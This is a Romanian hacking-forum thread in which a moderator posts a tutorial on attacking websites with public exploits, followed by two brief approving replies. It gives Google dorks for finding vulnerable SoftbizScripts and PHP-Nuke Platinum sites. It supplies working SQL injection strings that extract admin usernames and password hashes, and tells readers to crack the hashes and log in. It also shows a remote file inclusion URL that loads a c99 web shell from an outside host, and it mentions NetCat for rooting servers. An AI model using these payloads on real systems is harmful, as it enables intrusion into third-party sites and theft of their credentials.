EliteHackers
SALUT 2022!! NE-AM MUTAT PE DISCORD ! Vrei să inviți un prieten? [T]eoria [H]aosului [C]ontrolat - https://discord.com/invite/U4HBCHzm7r Acesta aste link-ul oficial al acestui server. 		Lista Forumurilor Pe Tematici
EliteHackers | Reguli | Inregistrare | Login

POZE ELITEHACKERS

Nu sunteti logat. 		Nou pe simpatie:
ramona23
Femeie
24 ani
Bucuresti
cauta Barbat
24 - 52 ani
EliteHackers / Windows - Hacking & Tools / Despre Exploituri Moderat de Ad_Infinitum, AntiKiler, Puscas_marin, kooze, r3v
Autor
Mesaj Pagini: 1
Puscas_marin
Moderator

Inregistrat: acum 17 ani
Postari: 315
M-am gandit sa Fac acest tutorial ca sa va pot ajuta sa avnsati si sa stiti cum sa folositi un exploit

1.)Ce este un exploit(degeba pornim la drum daca nu se stie ce este un exploit) ?

Raspunsul este ca "Un exploit este un program care se foloseste de erorile si bug-urile din alte programe, permitand unui atacator sa dea anumite comenzi luand controlul asupra Site-ului afectat.

Sunt exploituri care se folosesc pentru a patrunde prin vulnerabilitatile unui calculator pentru a primi administrator (windows) sau rooter(linux) dar noi ne vom ocupa azi doar de exploiturile folosite pentru a patrunde prin vulnerabilitatile site-urilor.


In ceea ce urmeaza o sa prezint 3 tipuri de exploituri:
*SQL infection ( veti gasi un user si o parola criptata in md5 care trebuie decripata)
*RFI (Remote file inclusion)( o sa aveti nevoie si de un sell)
*Exploituri care se comipileaza(voi vorbi despre cele cele care se compileaza in perl)

Deci sa incepem :

!!! SQL INFECTION
Tehnica SQL injection da posibilitatea unui atacator sa execute comenzi SQL neautorizate profitand de oportunitati neortodoxe de intrare in aplicatiile web construind interogari SQL dinamice.[color]

haideti sa cautam un exploit o sa folosesc unul de pe milworm. (cand o sa stiu ff bine programare sql o sa fac eu exploituri pana atunci o sa folosesc milworm)

Code:

DORK: "Powered by SoftbizScripts" "ALL JOBS"                                       
                                                                                          
#Injection Adress : http://site.com/browsecats.php?cid=[sql cod]                    #
#Sql code For see user name: 999999%20union/**/select/**/0,sb_admin_name,2,3/**/from/**/sbjbs_admin/*
#Sql code For see Password : 999999%20union/**/select/**/0,sb_pwd,2,3/**/from/**/sbjbs_admin/*
                                                                                  #
#Admin panel for login:http://site.com/admin/index.php

Exploitul ne prezinta un dorck:[color=red]"Powered by SoftbizScripts" "ALL JOBS"  , ce facem cu acest dorck? il punem intr-un motor de cautare si cautam site-uri. Ex: www.google.ro

Dupa cum ati observat in poza exploitul a mai fost folosit deorece apare un site "hacked" dar asta nu e inportant deoarece este important ca voi sa intelegeti cum sta treba cu SQL infetion

Am luat acest exploit la intamplare si se pare ca majoritatea site-urilor au fost hakerite, imi cer scuze dar nu mai am timp sa caut altul dar sa va explic cum sta treba:bv2:

Dupa ce ati dat search ca in poza pusa de mine v-or aparea o multime de site-uri unele vulnerabile alte-le nu, trebuie sa le incercati pe tote pe rand:HAHA:, deci intrati in fiecare site si incepte sa faceti urmatorele dupa numele site-ului puneti urmatorul cod care ni'l prezinta exploitul /browsecats.php?cid=[sql cod]
-[sql cod] in inlocuiti de doua ori o data cu "999999%20union/**/select/**/0,sb_admin_name,2,3/**/from/**/sbjbs_admin/*" pentru a afla numele adminului si o data cu "999999%20union/**/select/**/0,sb_pwd,2,3/**/from/**/sbjbs_admin/*"          pentru a putea afla parola, parola va fi criptata in md5 va fi ceva de genul asta "d41d8cd98f00b204e9800998ecf8427e"  acum trebuie decriptata pt asta putefi folosi milworm http://www.milw0rm.com/cracker/insert.php, apui nu trebuie sa faceti altceva decat sa va logati cu userul si parola gasita si aveti control asupara site-ului.

Sa trecema mai departe :
RFI (Remote file inclusion)
Cu aceasta vulnerabilitate, puteti introduce un shell, sau un script php intr-un anumit site vulnerabil.
Deobicei, cei care folosesc RFI, uploadeaza un shell sau NetCat (pentru a roota site-ul).

acum sa laegem un exploit pt RFI o sa alegem tot un exploit de pe milworm:

Code:

Vulnerability Type: Remote File Inclusion
Vulnerable file: /Platinum 7.6.b.5 Php_Nuke_Fusion/public_html/modules/Forums/favorites.php
Exploit URL: http://localhost/Platinum 7.6.b.5 Php_Nuke_Fusion/public_html/modules/Forums/favorites.php?nuke_bb_root_path=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: nuke_bb_root_path
Line number: 24
DoRk:Powered by Platinum 7.6.b.5



in cazul la rfi veti nevoie de un shell(evil cod)
Ce este un shell? Shellul este un exploit special specializat sa intre pe o anumita vulnerabilitate si sa returneze valorile scriptului.
un exmplu de shell este c99:
http://xakforum.altnet.ru/tmp_upload/files/c99shell.txt (un shell gata uploadat)

procedatati ca si la sql infection cautati prin dorck, apoi incepeti a testa site-urile astfel www.site-urile vostre.com/Platinum 7.6.b.5 Php_Nuke_Fusion/public_html/modules/Forums/favorites.php?nuke_bb_root_pathselul tau adick in cazul nostru punem shellul asta http://xakforum.altnet.ru/tmp_upload/fi ... shell.txt?) Partea buna la Rfi este ca trebuie decripata nici o parola caci intri direct in site iti pare intregul script, avand posisbiliatea de a modifica indexul sau alte documente de pe site.


Si in sfarsit a treia categorie:
Exploituri care se compileaza in perl
Aceste exploituir arata cevqa de genul

Code:

#!/usr/bin/perl
#
# OneCMS v2.4 Remote SQL Injection Exploit
# 
# Description
# -----------
# OneCMS contains a flaw that allows an attacker to carry out an SQL 
# injection attack. The issue is due to the userreviews.php script not 
# properly sanitizing user-supplied input to the 'abc' variable. This may 
# allow an attacker to inject or manipulate SQL queries in the backend 
# database if magic_quotes_gpc = off.
# -----------
# $Id: milw0rm_onecms.pl,v 0.1 2007/09/19 15:02:12 str0ke Exp $
Aici urmeaza codurile exploitului

Aveti nevoie Active perl pentru a putea compila exploitul.
Luati exploitul dorit in puneti in notepad ii dati ce nume vreti dar puneti extensia .pl



exploiturile se mai po comila in c++, in vb, in python etc

imi cer scuze pentru orice eroare facuta, pentru orice gresela de exprimare si alte greseli, promit ca o sa caut exploituri bune si o sa fac si alte tutoriale cu rfi si sql infection, ca sa intelegeti perfect, astept intrebari 

_______________________________________
Deci asa se fac banii....da clik sa vezi
pus acum 17 ani
   
Exploit
Administrator

Din: I'm from everywhere..
Inregistrat: acum 18 ani
Postari: 600
Bun tutorial.. bv bv bv

_______________________________________
...:::Only God Can Judge Me:::...
pus acum 17 ani
   
Puscas_marin
Moderator

Inregistrat: acum 17 ani
Postari: 315
Mesri pt sprijin 

_______________________________________
Deci asa se fac banii....da clik sa vezi
pus acum 17 ani
   
Pagini: 1  

Mergi la